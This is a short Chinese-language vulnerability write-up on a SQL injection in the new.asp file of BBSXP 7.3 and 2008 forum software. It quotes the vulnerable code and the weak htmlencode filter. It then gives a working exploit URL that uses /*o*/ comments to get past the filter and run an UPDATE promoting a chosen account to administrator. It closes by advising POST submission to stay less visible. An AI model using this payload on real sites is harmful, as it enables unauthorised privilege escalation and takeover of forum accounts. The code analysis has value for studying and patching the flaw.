受影响系统:
bbsxp7.3
bbsxp2008
漏洞文件:
new.asp
代码分析:
sort=htmlencode(request("sort")) //第24行
if sort = empty then
sqlsort="threadid"
else
sqlsort=sort
end if
。。。。。。
sql="select top "&sqltopiccount&" * from ["&tableprefix&"threads] where visible=1 "&sqlforumid&" "&sqltimelimit&" order by "&sqlsort&" desc" //第66行
过滤函数htmlencode 在文件bbsxp_class.asp中:
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42)&chr(42),"**") '“**”/**/
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([&#])([a-z0-9]*);","$1$2;")
if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*"))
if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if
htmlencode=fstring
end function
htmlencode过滤了tab键,空格,** .
变量sqlsort过滤不严导致sql注入漏洞的产生。
漏洞测试:
http://localhost/bbsxp/new.asp?sort=threadid/*o*/update/*o*/bbsxp_users/*o*/set/*o*/userroleid=1/*o*/where/*o*/username=0x6c006f00760065006d006d006d00/*o*/select/*o*/*/*o*/from/*o*/bbsxp_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用post提交呵呵)
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论